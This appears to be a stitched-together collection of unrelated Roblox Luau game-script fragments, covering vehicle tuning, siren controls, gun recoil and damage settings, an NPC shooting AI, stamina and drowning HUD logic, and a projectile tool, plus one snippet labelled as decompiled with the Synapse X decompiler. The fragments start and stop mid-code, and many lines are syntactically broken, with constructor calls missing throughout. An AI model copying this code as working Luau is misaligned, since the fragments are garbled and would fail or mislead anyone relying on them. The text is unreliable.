--[=[ Destroys the timer. This will also stop the timer. ]=]
function Timer:Destroy() self.Tick:Destroy() self:Stop() end return Timer
--[[ Create a composite reducer from a map of keys and sub-reducers. ]]
local function combineReducers(map) return function(state, action) -- If state is nil, substitute it with a blank table. if state == nil then state = {} end local newState = {} for key, reducer in pairs(map) do -- Each reducer gets its own state, not the entire state table newState[key] = reducer(state[key], action) end return newState end end return combineReducers
--[[ A ref is nothing more than a binding with a special field 'current' that maps to the getValue method of the binding ]]
local Binding = require(script.Parent.Binding) local function createRef() local binding, _ = Binding.create(nil) local ref = {} --[[ A ref is just redirected to a binding via its metatable ]] setmetatable(ref, { __index = function(_self, key) if key == "current" then return binding:getValue() else return binding[key] end end, __newindex = function(_self, key, value) if key == "current" then error("Cannot assign to the 'current' property of refs", 2) end binding[key] = value end, __tostring = function(_self) return ("RoactRef(%s)"):format(tostring(binding:getValue())) end, }) return ref end return createRef
--Torque Curve Tune.Horsepower = 203 -- [TORQUE CURVE VISUAL] Tune.IdleRPM = 700 -- Tune.PeakRPM = 6500 -- Use sliders to manipulate values Tune.Redline = 7000.01 -- Copy and paste slider values into the respective tune values Tune.EqPoint = 6500 Tune.PeakSharpness = 7.5 Tune.CurveMult = 0.16 --Incline Compensation Tune.InclineComp = 1.7 -- Torque compensation multiplier for inclines (applies gradient from 0-90 degrees) --Misc Tune.RevAccel = 100 -- RPM acceleration when clutch is off Tune.RevDecay = 75 -- RPM decay when clutch is off Tune.RevBounce = 500 -- RPM kickback from redline Tune.IdleThrottle = 3 -- Percent throttle at idle Tune.ClutchTol = 500 -- Clutch engagement threshold (higher = faster response)
--------------------) Settings
Damage = 0 -- the ammout of health the player or mob will take Cooldown = 10 -- cooldown for use of the tool again ZoneModelName = "Blood pool" -- name the zone model MobHumanoidName = "Humanoid"-- the name of player or mob u want to damage
-- -- -- -- -- -- -- --DIRECTION SCROLL-- -- -- -- -- -- -- --
This.Parent.Parent.Parent.Parent.Parent:WaitForChild("Direction").Changed:connect(function(val) if val == 1 then for R = 1, 7 do for D = 1, 5 do This.Display["Matrix"..1]["Row"..R]["D"..D].ImageColor3 = UColor end end repeat SetDisplay(1,"U0") wait(ArrowDelay) SetDisplay(1,"U1") wait(ArrowDelay) SetDisplay(1,"U2") wait(ArrowDelay) SetDisplay(1,"U3") wait(ArrowDelay) SetDisplay(1,"U4") wait(ArrowDelay) SetDisplay(1,"U5") wait(ArrowDelay) SetDisplay(1,"U6") wait(ArrowDelay) until This.Parent.Parent.Parent.Parent.Parent.Direction.Value ~= 1 SetDisplay(1,"NIL") elseif val == -1 then for R = 1, 7 do for D = 1, 5 do This.Display["Matrix"..1]["Row"..R]["D"..D].ImageColor3 = DColor end end repeat SetDisplay(1,"D0") wait(ArrowDelay) SetDisplay(1,"D1") wait(ArrowDelay) SetDisplay(1,"D2") wait(ArrowDelay) SetDisplay(1,"D3") wait(ArrowDelay) SetDisplay(1,"D4") wait(ArrowDelay) SetDisplay(1,"D5") wait(ArrowDelay) SetDisplay(1,"D6") wait(ArrowDelay) until This.Parent.Parent.Parent.Parent.Parent.Direction.Value ~= -1 SetDisplay(1,"NIL") else SetDisplay(1,"NIL") end end)
--[[ * Used to print values in error messages. ]]
local function inspect(value, options: InspectOptions?): string local inspectOptions: InspectOptions = options or { depth = DEFAULT_RECURSIVE_DEPTH } local depth = inspectOptions.depth or DEFAULT_RECURSIVE_DEPTH inspectOptions.depth = if depth >= 0 then depth else DEFAULT_RECURSIVE_DEPTH return formatValue(value, {}, inspectOptions :: FormatOptions) end local function isIndexKey(k, contiguousLength) return type(k) == "number" and k <= contiguousLength -- nothing out of bounds and 1 <= k -- nothing illegal for array indices and math.floor(k) == k -- no float keys end local function getTableLength(tbl) local length = 1 local value = rawget(tbl, length) while value ~= nil do length += 1 value = rawget(tbl, length) end return length - 1 end local function sortKeysForPrinting(a: any, b) local typeofA = type(a) local typeofB = type(b) -- strings and numbers are sorted numerically/alphabetically if typeofA == typeofB and (typeofA == "number" or typeofA == "string") then return a < b end -- sort the rest by type name return typeofA < typeofB end local function rawpairs(t) return next, t, nil end local function getFragmentedKeys(tbl) local keys = {} local keysLength = 0 local tableLength = getTableLength(tbl) for key, _ in rawpairs(tbl) do if not isIndexKey(key, tableLength) then keysLength = keysLength + 1 keys[keysLength] = key end end table.sort(keys, sortKeysForPrinting) return keys, keysLength, tableLength end function formatValue(value, seenValues, options: FormatOptions) local valueType = typeof(value) if valueType == "string" then return HttpService:JSONEncode(value) -- deviation: format numbers like in JS elseif valueType == "number" then if value ~= value then return "NaN" elseif value == math.huge then return "Infinity" elseif value == -math.huge then return "-Infinity" else return tostring(value) end elseif valueType == "function" then local result = "[function" local functionName = :: (any) -> any, "n") if functionName ~= nil and functionName ~= "" then result ..= " " .. functionName end return result .. "]" elseif valueType == "table" then -- ROBLOX TODO: parameterize inspect with the library-specific NULL sentinel. maybe function generics? -- if value == NULL then -- return 'null' -- end return formatObjectValue(value, seenValues, options) else return tostring(value) end end function formatObjectValue(value, previouslySeenValues, options: FormatOptions) if table.find(previouslySeenValues, value) ~= nil then return "[Circular]" end local seenValues = { unpack(previouslySeenValues) } table.insert(seenValues, value) if typeof(value.toJSON) == "function" then local jsonValue = value:toJSON(value) if jsonValue ~= value then if typeof(jsonValue) == "string" then return jsonValue else return formatValue(jsonValue, seenValues, options) end end elseif isArray(value) then return formatArray(value, seenValues, options) end return formatObject(value, seenValues, options) end function formatObject(object, seenValues, options: FormatOptions) local result = "" local mt = getmetatable(object) if mt and rawget(mt, "__tostring") then return tostring(object) end local fragmentedKeys, fragmentedKeysLength, keysLength = getFragmentedKeys(object) if keysLength == 0 and fragmentedKeysLength == 0 then result ..= "{}" return result end if #seenValues > options.depth then result ..= "[" .. getObjectTag(object) .. "]" return result end local properties = {} for i = 1, keysLength do local value = formatValue(object[i], seenValues, options) table.insert(properties, value) end for i = 1, fragmentedKeysLength do local key = fragmentedKeys[i] local value = formatValue(object[key], seenValues, options) table.insert(properties, key .. ": " .. value) end result ..= "{ " .. table.concat(properties, ", ") .. " }" return result end function formatArray(array: Array<any>, seenValues: Array<any>, options: FormatOptions): string local length = #array if length == 0 then return "[]" end if #seenValues > options.depth then return "[Array]" end local len = math.min(MAX_ARRAY_LENGTH, length) local remaining = length - len local items = {} for i = 1, len do items[i] = (formatValue(array[i], seenValues, options)) end if remaining == 1 then table.insert(items, "... 1 more item") elseif remaining > 1 then table.insert(items, ("... %s more items"):format(tostring(remaining))) end return "[" .. table.concat(items, ", ") .. "]" end function getObjectTag(_object): string -- local tag = Object.prototype.toString -- .call(object) -- .replace("") -- .replace("") -- if tag == "Object" and typeof(object.constructor) == "function" then -- local name = -- if typeof(name) == "string" and name ~= "" then -- return name -- end -- end -- return tag return "Object" end return inspect
--// # key, ManOff
mouse.KeyUp:connect(function(key) if key=="f" then veh.Lightbar.middle.Man:Stop() veh.Lightbar.middle.Wail.Volume = 3 veh.Lightbar.middle.Yelp.Volume = 3 veh.Lightbar.middle.Priority.Volume = 3 script.Parent.Parent.Sirens.Man.BackgroundColor3 = Color3.fromRGB(62, 62, 62) veh.Lightbar.MANUAL.Transparency = 1 end end) mouse.KeyDown:connect(function(key) if key=="j" then veh.Lightbar.middle.Beep:Play() veh.Lightbar.RemoteEvent:FireServer(true) end end) mouse.KeyDown:connect(function(key) if key=="k" then veh.Lightbar.middle.Beep:Play() veh.Lightbar.TAEvent:FireServer(true) end end) mouse.KeyDown:connect(function(key) if key=="b" then veh.Lightbar.middle.Beep:Play() veh.Lightbar.AlleyEvent:FireServer(true) end end) mouse.KeyDown:connect(function(key) if key=="v" then veh.Lightbar.middle.Beep:Play() veh.Lightbar.TKDNEvent:FireServer(true) end end)
--// Recoil Settings
gunrecoil = -1; -- How much the gun recoils backwards when not aiming camrecoil = 0.3; -- How much the camera flicks when not aiming AimGunRecoil = -1; -- How much the gun recoils backwards when aiming AimCamRecoil = 0.3; -- How much the camera flicks when aiming CamShake = 28; -- THIS IS NEW!!!! CONTROLS CAMERA SHAKE WHEN FIRING AimCamShake = 24; -- THIS IS ALSO NEW!!!! Kickback = 17.11; -- Upward gun rotation when not aiming AimKickback = 17.11; -- Upward gun rotation when aiming
script.Parent.OnServerEvent:connect(function(pl,n) if lt~=1 then pr = true else pr=false end lt=n if (lt == 0 or lt == 1) then RefMt.DesiredAngle = RefMt.CurrentAngle%math.rad(360) RefMt.CurrentAngle = RefMt.CurrentAngle%math.rad(360) UpdateLt(1,white) UpdatePt(false,white) StopMt(pr) repeat wait() until (lt~=0 and lt~=1) elseif lt == 2 then UpdateLt(.25,white) UpdatePt(true,white) UpdateMt(0,9e9,1) repeat if math.deg(RefMt.CurrentAngle%math.rad(360)) >= 90 then UpdateLt(.25,white) end if math.deg(RefMt.CurrentAngle%math.rad(360)) >= 90 then UpdatePt(true,white) end if math.deg(RefMt.CurrentAngle%math.rad(360)) >= 270 then UpdateLt(.25,red) end if math.deg(RefMt.CurrentAngle%math.rad(360)) >= 270 then UpdatePt(true,red) end wait() until lt~=2 elseif lt == 3 then UpdateLt(.25,red) UpdatePt(true,red) UpdateMt(0,9e9,1) repeat wait() until lt~=3 end end)
--[[Wheel Configuration]]
--Store Reference Orientation Function function getParts(model,t,a) for i,v in pairs(model:GetChildren()) do if v:IsA("BasePart") then table.insert(t,{v,a.CFrame:toObjectSpace(v.CFrame)}) elseif v:IsA("Model") then getParts(v,t,a) end end end --PGS/Legacy local fDensity = _Tune.FWheelDensity local rDensity = _Tune.RWheelDensity local fDistX=_Tune.FWsBoneLen*math.cos(math.rad(_Tune.FWsBoneAngle)) local fDistY=_Tune.FWsBoneLen*math.sin(math.rad(_Tune.FWsBoneAngle)) local rDistX=_Tune.RWsBoneLen*math.cos(math.rad(_Tune.RWsBoneAngle)) local rDistY=_Tune.RWsBoneLen*math.sin(math.rad(_Tune.RWsBoneAngle)) local fSLX=_Tune.FSusLength*math.cos(math.rad(_Tune.FSusAngle)) local fSLY=_Tune.FSusLength*math.sin(math.rad(_Tune.FSusAngle)) local rSLX=_Tune.RSusLength*math.cos(math.rad(_Tune.RSusAngle)) local rSLY=_Tune.RSusLength*math.sin(math.rad(_Tune.RSusAngle)) for _,v in pairs(Drive) do --Apply Wheel Density if v.Name=="FL" or v.Name=="FR" or v.Name=="F" then if v:IsA("BasePart") then if v.CustomPhysicalProperties == nil then v.CustomPhysicalProperties = end v.CustomPhysicalProperties = fDensity, v.CustomPhysicalProperties.Friction, v.CustomPhysicalProperties.Elasticity, v.CustomPhysicalProperties.FrictionWeight, v.CustomPhysicalProperties.ElasticityWeight ) end else if v:IsA("BasePart") then if v.CustomPhysicalProperties == nil then v.CustomPhysicalProperties = end v.CustomPhysicalProperties = rDensity, v.CustomPhysicalProperties.Friction, v.CustomPhysicalProperties.Elasticity, v.CustomPhysicalProperties.FrictionWeight, v.CustomPhysicalProperties.ElasticityWeight ) end end --Resurface Wheels for _,a in pairs({"Top","Bottom","Left","Right","Front","Back"}) do v[a.."Surface"]=Enum.SurfaceType.SmoothNoOutlines end --Store Axle-Anchored/Suspension-Anchored Part Orientation local WParts = {} local tPos = v.Position-car.DriveSeat.Position if v.Name=="FL" or v.Name=="RL" then v.CFrame = car.DriveSeat.CFrame*CFrame.Angles(math.rad(90),0,math.rad(90)) else v.CFrame = car.DriveSeat.CFrame*CFrame.Angles(math.rad(90),0,math.rad(-90)) end v.CFrame = v.CFrame+tPos if v:FindFirstChild("Parts")~=nil then getParts(v.Parts,WParts,v) end if v:FindFirstChild("Fixed")~=nil then getParts(v.Fixed,WParts,v) end --Align Wheels if v.Name=="FL" then v.CFrame = v.CFrame*CFrame.Angles(math.rad(_Tune.FCamber),math.rad(-_Tune.FCaster),math.rad(_Tune.FToe)) elseif v.Name=="FR" then v.CFrame = v.CFrame*CFrame.Angles(math.rad(_Tune.FCamber),math.rad(_Tune.FCaster),math.rad(-_Tune.FToe)) elseif v.Name=="RL" then v.CFrame = v.CFrame*CFrame.Angles(math.rad(_Tune.RCamber),math.rad(-_Tune.RCaster),math.rad(_Tune.RToe)) elseif v.Name=="RR" then v.CFrame = v.CFrame*CFrame.Angles(math.rad(_Tune.RCamber),math.rad(_Tune.RCaster),math.rad(-_Tune.RToe)) end --Re-orient Axle-Anchored/Suspension-Anchored Parts for _,a in pairs(WParts) do a[1].CFrame=v.CFrame:toWorldSpace(a[2]) end
-- by default, warns
local function warnWithTracebackOnError(func, shouldNotWarn) return xpcall(func, function(err) if not shouldNotWarn then warn(tostring(err) .. "\n" .. debug.traceback()) end return false, err end) end function, shouldNotWarn) local success, err = warnWithTracebackOnError(coroutine.wrap(func), shouldNotWarn) if not success and not shouldNotWarn then warn(err) end return success, err end return SafeSpawn
---------------------------------------------------------------------------------------------------- --------------------=[ CFRAME ]=-------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------
,EnableHolster = false ,HolsterTo = 'Torso' -- Put the name of the body part you wanna holster to ,HolsterPos =,0,0) * CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)) ,RightArmPos =, 0.55, -1.1) * CFrame.Angles(math.rad(-90), math.rad(0), math.rad(0)) --Server ,LeftArmPos =,0.55,-1.15) * CFrame.Angles(math.rad(-90),math.rad(0),math.rad(0)) --server ,ServerGunPos =, -1, -0.4) * CFrame.Angles(math.rad(-90), math.rad(0), math.rad(0)) ,GunPos =, -0.15, 1) * CFrame.Angles(math.rad(90), math.rad(0), math.rad(0)) ,RightPos =, 0.15, -1.1) * CFrame.Angles(math.rad(-90), math.rad(0), math.rad(0)) --Client ,LeftPos =,0.15,-1.15) * CFrame.Angles(math.rad(-90),math.rad(0),math.rad(0)) --Client } return Config
local DataStoreService = game:GetService('DataStoreService') local ReplicatedStorage = game:GetService('ReplicatedStorage')
-- Objects
local PlayerIcon = ReplicatedStorage.Assets.General.UI.PlayerIcon
--if i <= 0 then
script.Parent.Main.TextLabel.Text = "Time Left: "..i
-- Decompiled with the Synapse X Luau decompiler.
local v1 = {}; local v2 = require(game.ReplicatedStorage.Modules.Lightning); local v3 = require(game.ReplicatedStorage.Modules.Xeno); local v4 = require(game.ReplicatedStorage.Modules.CameraShaker); local l__TweenService__5 = game.TweenService; local l__Debris__6 = game.Debris; local l__ReplicatedStorage__1 = game.ReplicatedStorage; function v1.RunStompFx(p1, p2, p3, p4) local v7 = l__ReplicatedStorage__1.KillFX[p1].Stomp:Clone(); v7.Parent = p2.Parent.UpperTorso and p2; v7:Play(); game.Debris:AddItem(v7, 3); local v8 = l__ReplicatedStorage__1.KillFX[p1].Sonny:Clone(); v8.Parent = workspace.Ignored.Animations; v8.CFrame = *, 0.5, 0); game.Debris:AddItem(v8, 4); delay(0, function() for v9 = 1, 0, -0.05 do v8.KO.Image.UIGradient.Transparency ={, 1),, v9),, 1) }); task.wait(0.01); end; task.wait(1); for v10 = 0, 1, 0.025 do v8.KO.Image.UIGradient.Transparency ={, 1),, v10),, 1) }); task.wait(0.01); end; end); return nil; end; return v1;
-- / Settings / --
local Settings = { Buttons = 6 } local ActivatedButtons = {}
mouse.KeyDown:connect(function (key) key = string.lower(key) if key == "c" then --Camera controls if cam == ("car") then Camera.CameraSubject = player.Character.Humanoid Camera.CameraType = ("Custom") cam = ("freeplr") Camera.FieldOfView = 70 limitButton.Text = "Free Camera" wait(3) limitButton.Text = "" elseif cam == ("freeplr") then Camera.CameraSubject = player.Character.Humanoid Camera.CameraType = ("Attach") cam = ("lockplr") Camera.FieldOfView = 60 limitButton.Text = "FPV Camera" wait(3) limitButton.Text = "" elseif cam == ("lockplr") then Camera.CameraSubject = carSeat Camera.CameraType = ("Attach") cam = ("car") Camera.FieldOfView = 50 limitButton.Text = "Standard Camera" wait(3) limitButton.Text = "" end end end)
local toCopy=model.Part3 local spd=script.Speed:Clone() spd.Parent = toCopy spd.Value = 0.1 local die=script.Died:Clone() die.Parent = toCopy die.Disabled = false local scr=script.MovedBlock:Clone() scr.Parent = toCopy scr.Disabled = false
-- Force direction
function EjectionForce.CalculateForce() return math.random(170,220) / 10, -- Side to side math.random(50,70) / 10, -- Up -math.random(600,620) / 10 -- Front ) end
task.spawn(function() while true do if Dead then break end AI() local n,mag,hum=near() if n and not Dead then n=n.p if not r then w=.14 local dir=h.Position-n local tst ,_ =workspace:FindPartOnRay(,(n-t.Torso.Position).Unit*999),t) local aim*RecoilSpread,mag*RecoilSpread),math.random(-mag*RecoilSpread,mag*RecoilSpread),math.random(-mag*RecoilSpread,mag*RecoilSpread))+hum if tst and not Dead then local FoundHuman,VitimaHuman = CheckForHumanoid(tst) if FoundHuman == true and VitimaHuman.Health > 0 and game.Players:GetPlayerFromCharacter(VitimaHuman.Parent) and perception >= 10 then function lookAt(target, eye) local forwardVector = (eye - target).Unit local upVector =, 1, 0) -- You have to remember the right hand rule or google search to get this right local rightVector = forwardVector:Cross(upVector) local upVector2 = rightVector:Cross(forwardVector) return CFrame.fromMatrix(eye, rightVector, upVector2) end local direction = (n+hum)-h.CFrame.LookVector script.Parent:SetPrimaryPartCFrame(,,h.CFrame.Y,direction.Z))) Evt.ServerBullet:FireAllClients(nil, h.Position,(aim - h.Position).Unit,WeaponData,nil) h.Echo:Play() h.Fire:Play() local raycastParams = raycastParams.FilterDescendantsInstances = Ray_Ignore raycastParams.FilterType = Enum.RaycastFilterType.Blacklist raycastParams.IgnoreWater = true local raycastResult = workspace:Raycast(h.Position, (aim - h.Position).Unit*999, raycastParams) if raycastResult and raycastResult.Instance and not Dead then Hitmaker(raycastResult.Instance, raycastResult.Position, raycastResult.Normal, raycastResult.Material) local FoundHuman,VitimaHuman = CheckForHumanoid(raycastResult.Instance) if FoundHuman == true and VitimaHuman.Health > 0 and game.Players:GetPlayerFromCharacter(VitimaHuman.Parent) then local TotalDistTraveled = (raycastResult.Position - h.Position).Magnitude ------ How much damage the gun inflicts if raycastResult.Instance.Name == "Head" or raycastResult.Instance.Parent.Name == "Top" or raycastResult.Instance.Parent.Name == "Headset" or raycastResult.Instance.Parent.Name == "Olho" or raycastResult.Instance.Parent.Name == "Face" or raycastResult.Instance.Parent.Name == "Numero" then local DanoBase = math.random(WeaponData.HeadDamage[1], WeaponData.HeadDamage[2]) local Dano,DanoColete,DanoCapacete = CalcularDano(DanoBase, TotalDistTraveled, VitimaHuman, "Head") Damage(VitimaHuman,Dano,DanoColete,DanoCapacete) elseif (raycastResult.Instance.Parent:IsA('Accessory') or raycastResult.Instance.Parent:IsA('Hat')) then local DanoBase = math.random(WeaponData.HeadDamage[1], WeaponData.HeadDamage[2]) local Dano,DanoColete,DanoCapacete = CalcularDano(DanoBase, TotalDistTraveled, VitimaHuman, "Head") Damage(VitimaHuman,Dano,DanoColete,DanoCapacete) elseif raycastResult.Instance.Name == "Torso" or raycastResult.Instance.Parent.Name == "Chest" or raycastResult.Instance.Parent.Name == "Waist" then local DanoBase = math.random(WeaponData.TorsoDamage[1], WeaponData.TorsoDamage[2]) local Dano,DanoColete,DanoCapacete = CalcularDano(DanoBase, TotalDistTraveled, VitimaHuman, "Body") Damage(VitimaHuman,Dano,DanoColete,DanoCapacete) elseif raycastResult.Instance.Name == "Right Arm" or raycastResult.Instance.Name == "Left Arm" or raycastResult.Instance.Name == "Right Leg" or raycastResult.Instance.Name == "Left Leg" or raycastResult.Instance.Parent.Name == "Back" or raycastResult.Instance.Parent.Name == "Leg1" or raycastResult.Instance.Parent.Name == "Leg2" or raycastResult.Instance.Parent.Name == "Arm1" or raycastResult.Instance.Parent.Name == "Arm2" then local DanoBase = math.random(WeaponData.LimbDamage[1], WeaponData.LimbDamage[2]) local Dano,DanoColete,DanoCapacete = CalcularDano(DanoBase, TotalDistTraveled, VitimaHuman, "Body") Damage(VitimaHuman,Dano,DanoColete,DanoCapacete) else local DanoBase = math.random(WeaponData.LimbDamage[1], WeaponData.LimbDamage[2]) local Dano,DanoColete,DanoCapacete = CalcularDano(DanoBase, TotalDistTraveled, VitimaHuman, "Body") Damage(VitimaHuman,Dano,DanoColete,DanoCapacete) end end end ammo=ammo-1 if raycastResult then mag=(h.Position-raycastResult.Position).magnitude end t.Humanoid.WalkSpeed = ShootingWalkspeed elseif FoundHuman == true and VitimaHuman.Health > 0 and game.Players:GetPlayerFromCharacter(VitimaHuman.Parent) and perception < 10 then perception = perception + Settings.Level.Value t.Humanoid.WalkSpeed = SearchingWalkspeed Memory = Settings.Level.Value * 100 CanSee = true elseif perception > 0 then perception = perception - 1/Settings.Level.Value * 2 t.Humanoid.WalkSpeed = SearchingWalkspeed CanSee = false elseif perception <= 0 then perception = 0 t.Humanoid.WalkSpeed = RegularWalkspeed Memory = Memory - .25 end --print(Memory) end task.wait(RPM) -- How fast the enemy shoots if ammo==0 then reload() end end end end end)
-- ================================================================================ -- Settings - Black Hole -- ================================================================================
local Settings = {} Settings.DefaultSpeed = 135 -- Speed when not boosted [Studs/second, Range 50-300] Settings.BoostSpeed = 35 -- Speed when boosted [Studs/second, Maximum: 400] Settings.BoostAmount = 5 -- Duration of boost in seconds Settings.Steering = 10 -- How quickly the speeder turns [Range: 1-10]
--// Damage Settings
BaseDamage = 83; -- Torso Damage LimbDamage = 70; -- Arms and Legs ArmorDamage = 70; -- How much damage is dealt against armor (Name the armor "Armor") HeadDamage = 253; -- If you set this to 100, there's a chance the player won't die because of the heal script
if Valor == true then if Correndo.Value == true then ChangeStance = true Correndo.Value = false Stand() Stances = 0 end if Stances == 0 then Stand() end TS:Create(Poses.Levantado,, {ImageColor3 = Color3.fromRGB(150,0,0)} ):Play() TS:Create(Poses.Agaixado,, {ImageColor3 = Color3.fromRGB(150,0,0)} ):Play() TS:Create(Poses.Deitado,, {ImageColor3 = Color3.fromRGB(150,0,0)} ):Play() --Poses.Levantado.ImageColor3 = Color3.fromRGB(100,0,0) --Poses.Agaixado.ImageColor3 = Color3.fromRGB(100,0,0) --Poses.Deitado.ImageColor3 = Color3.fromRGB(100,0,0) --Main.Status.Barra.Stamina.BackgroundColor3 = Color3.fromRGB(170,0,0) else if Stances == 0 then Stand() end TS:Create(Poses.Levantado,, {ImageColor3 = Color3.fromRGB(255,255,255)} ):Play() TS:Create(Poses.Agaixado,, {ImageColor3 = Color3.fromRGB(255,255,255)} ):Play() TS:Create(Poses.Deitado,, {ImageColor3 = Color3.fromRGB(255,255,255)} ):Play() --Poses.Levantado.ImageColor3 = Color3.fromRGB(0,0,0) --Poses.Agaixado.ImageColor3 = Color3.fromRGB(0,0,0) --Poses.Deitado.ImageColor3 = Color3.fromRGB(0,0,0) --Main.Status.Barra.Stamina.BackgroundColor3 = Color3.fromRGB(125,125,125) end end) local BleedTween = TS:Create(Main.Poses.Bleeding,,Enum.EasingStyle.Linear,Enum.EasingDirection.InOut,-1,true), {ImageColor3 = Color3.fromRGB(150, 0, 0)} ) Sangrando.Changed:Connect(function(Valor) if Valor == true then Main.Poses.Bleeding.ImageColor3 = Color3.fromRGB(255,255,255) Main.Poses.Bleeding.Visible = true BleedTween:Play() else Main.Poses.Bleeding.Visible = false BleedTween:Cancel() end end) Caido.Changed:Connect(function(Valor) if Valor == true then if Stances ~= 0 then Poses.Levantado.Visible = true Poses.Agaixado.Visible = false Poses.Deitado.Visible = false Poses.Esg_Right.Visible = false Poses.Esg_Left.Visible = false CameraX = 0 CameraY = 0 Stances = 0 Correndo.Value = false Steady = false Stand() end end end) local a = Main.Vest.TextBox local b = Main.Helm.TextBox local Ener = Main.Poses.Energy function Vest() a.Text = math.ceil(Protecao.VestVida.Value) a.Parent.ImageColor3 = Color3.fromRGB(255,0,0) TS:Create(a.Parent,, {ImageColor3 = Color3.fromRGB(255, 255, 255)} ):Play() if Protecao.VestVida.Value <= 0 then a.Parent.Visible = false else a.Parent.Visible = true end end function Helmet() b.Text = math.ceil(Protecao.HelmetVida.Value) b.Parent.ImageColor3 = Color3.fromRGB(255,0,0) TS:Create(b.Parent,, {ImageColor3 = Color3.fromRGB(255, 255, 255)} ):Play() if Protecao.HelmetVida.Value <= 0 then b.Parent.Visible = false else b.Parent.Visible = true end end function Stamina() if ServerConfig.EnableStamina then if saude.Variaveis.Stamina.Value <= (saude.Variaveis.Stamina.MaxValue/2) then Ener.ImageColor3 =,saude.Variaveis.Stamina.Value/(saude.Variaveis.Stamina.MaxValue/2),saude.Variaveis.Stamina.Value/saude.Variaveis.Stamina.MaxValue) Ener.Visible = true elseif saude.Variaveis.Stamina.Value < saude.Variaveis.Stamina.MaxValue then Ener.ImageColor3 =,1,saude.Variaveis.Stamina.Value/saude.Variaveis.Stamina.MaxValue) Ener.Visible = true elseif saude.Variaveis.Stamina.Value >= saude.Variaveis.Stamina.MaxValue then Ener.Visible = false end else saude.Variaveis.Stamina.Value = saude.Variaveis.Stamina.MaxValue Ener.Visible = false end end Vest() Helmet() Stamina() Protecao.VestVida.Changed:Connect(Vest) Protecao.HelmetVida.Changed:Connect(Helmet) saude.Variaveis.Stamina.Changed:Connect(Stamina) Character.Humanoid.Changed:connect(function(Property) if ServerConfig.AntiBunnyHop then if Property == "Jump" and Character.Humanoid.Sit == true and Character.Humanoid.SeatPart ~= nil then Character.Humanoid.Sit = false elseif Property == "Jump" and Character.Humanoid.Sit == false then if JumpDelay then Character.Humanoid.Jump = false return false end JumpDelay = true delay(0, function() wait(ServerConfig.JumpCoolDown) JumpDelay = false end) end end end) local uis = game:GetService('UserInputService') local Evt = Engine:WaitForChild("Eventos") local placeEvent = Evt.Rappel:WaitForChild('PlaceEvent') local ropeEvent = Evt.Rappel:WaitForChild('RopeEvent') local cutEvent = Evt.Rappel:WaitForChild('CutEvent') uis.InputBegan:connect(function(input,chat) if not chat and Rappeling.Value == true then if input.KeyCode == Enum.KeyCode.C then ropeEvent:FireServer('Up',true) end; if input.KeyCode == Enum.KeyCode.X then ropeEvent:FireServer('Down',true) end; end end) uis.InputEnded:connect(function(input,chat) if not chat and Rappeling.Value == true then if input.KeyCode == Enum.KeyCode.C then ropeEvent:FireServer('Up',false) end; if input.KeyCode == Enum.KeyCode.X then ropeEvent:FireServer('Down',false) end; end end) function L_150_.Update() local L_174_ = L_153_.cornerPeek.t = L_153_.peekFactor * Virar local L_326_ = CFrame.fromAxisAngle(, 0, 1), L_153_.cornerPeek.p) -- SOLUTION TO 3RD PERSON -->,0,0) * CFrame.fromAxisAngle(,0,1), this.cornerPeek.p) Camera.CFrame = Camera.CFrame * L_326_ * L_174_ if saude.Variaveis.Stamina.Value <= (saude.Variaveis.Stamina.MaxValue/2) then local StaminaX = (1 - (saude.Variaveis.Stamina.Value)/(saude.Variaveis.Stamina.MaxValue/2))/20 Camera.CoordinateFrame = Camera.CoordinateFrame * CFrame.Angles( math.rad( StaminaX * math.sin( tick() * 3.5 )) , math.rad( StaminaX * math.sin( tick() * 1 )), 0) end end local Nadando = false function onStateChanged(_,state) --print(state) if state == Enum.HumanoidStateType.Swimming then Nadando = true else Nadando = false end end maxAir = 100 air = maxAir lastHealth = 100 lastHealth2 = 100 maxWidth = 0.96 Humanoid.StateChanged:connect(onStateChanged) game:GetService("RunService"):BindToRenderStep("Camera Update", 200, L_150_.Update) while wait() do if ServerConfig.CanDrown then local headLoc = game.Workspace.Terrain:WorldToCell(player.Character.Head.Position) local hasAnyWater = game.Workspace.Terrain:GetWaterCell(headLoc.x, headLoc.y, headLoc.z) if player.Character.Humanoid.Health ~= 0 then if hasAnyWater then if air > 0 then air = air-0.15 elseif air <= 0 then air = 0 Evt.Afogar:FireServer() end else if air < maxAir then air = air + .5 end end end if air <= 50 then script.Parent.Frame.Oxygen.ImageColor3 =,air/50,air/100) script.Parent.Frame.Oxygen.Visible = true elseif air < maxAir then script.Parent.Frame.Oxygen.ImageColor3 =,1,air/100) script.Parent.Frame.Oxygen.Visible = true elseif air >= maxAir then script.Parent.Frame.Oxygen.Visible = false end script.Parent.Efeitos.Oxigen.ImageTransparency = air/100 if air <= 25 then script.Parent.Efeitos.Oxigen.BackgroundTransparency = air/25 end end if ServerConfig.EnableStamina then if Correndo.Value == true and Velocidade > 0 then saude.Variaveis.Stamina.Value = saude.Variaveis.Stamina.Value - ServerConfig.RunValue elseif Stances == 0 and (Correndo.Value == false or Velocidade <= 0) then saude.Variaveis.Stamina.Value = saude.Variaveis.Stamina.Value + ServerConfig.StandRecover elseif Stances == 1 and (Correndo.Value == false or Velocidade <= 0) then saude.Variaveis.Stamina.Value = saude.Variaveis.Stamina.Value + ServerConfig.CrouchRecover elseif Stances == 2 and (Correndo.Value == false or Velocidade <= 0) then saude.Variaveis.Stamina.Value = saude.Variaveis.Stamina.Value + ServerConfig.ProneRecover end end end
-- run for the first time
if package:GetAttribute('FallbackImage') then updateFallbackImage() end
-- Make mainPart spin in a loop --while true do -- mainPart.CFrame = mainPart.CFrame * CFrame.Angles(0, math.rad(1), 0) -- wait() --end
-- find player's head pos
local vCharacter = Tool.Parent local vPlayer = game.Players:playerFromCharacter(vCharacter) --local head = vCharacter:findFirstChild("Head") local head = locateHead() if head == nil then return end --computes a the intended direction of the projectile based on where the mouse was clicked in reference to the head local dir = mouse_pos - head.Position dir = computeDirection(dir) local launch = head.Position + 3 * dir local delta = mouse_pos - launch local dy = delta.y local new_delta =, 0, delta.z) delta = new_delta local dx = delta.magnitude local unit_delta = delta.unit -- acceleration due to gravity in RBX units local g = (-9.81 * 20) local theta = computeLaunchAngle( dx, dy, g) local vy = math.sin(theta) local xz = math.cos(theta) local vx = unit_delta.x * xz local vz = unit_delta.z * xz local missile = Pellet:clone() missile.Position = launch missile.Velocity =,vy,vz) * VELOCITY missile.PelletScript.Disabled = false local creator_tag ="ObjectValue") creator_tag.Value = vPlayer creator_tag.Name = "creator" creator_tag.Parent = missile missile.Parent = game.Workspace end function locateHead() local vCharacter = Tool.Parent local vPlayer = 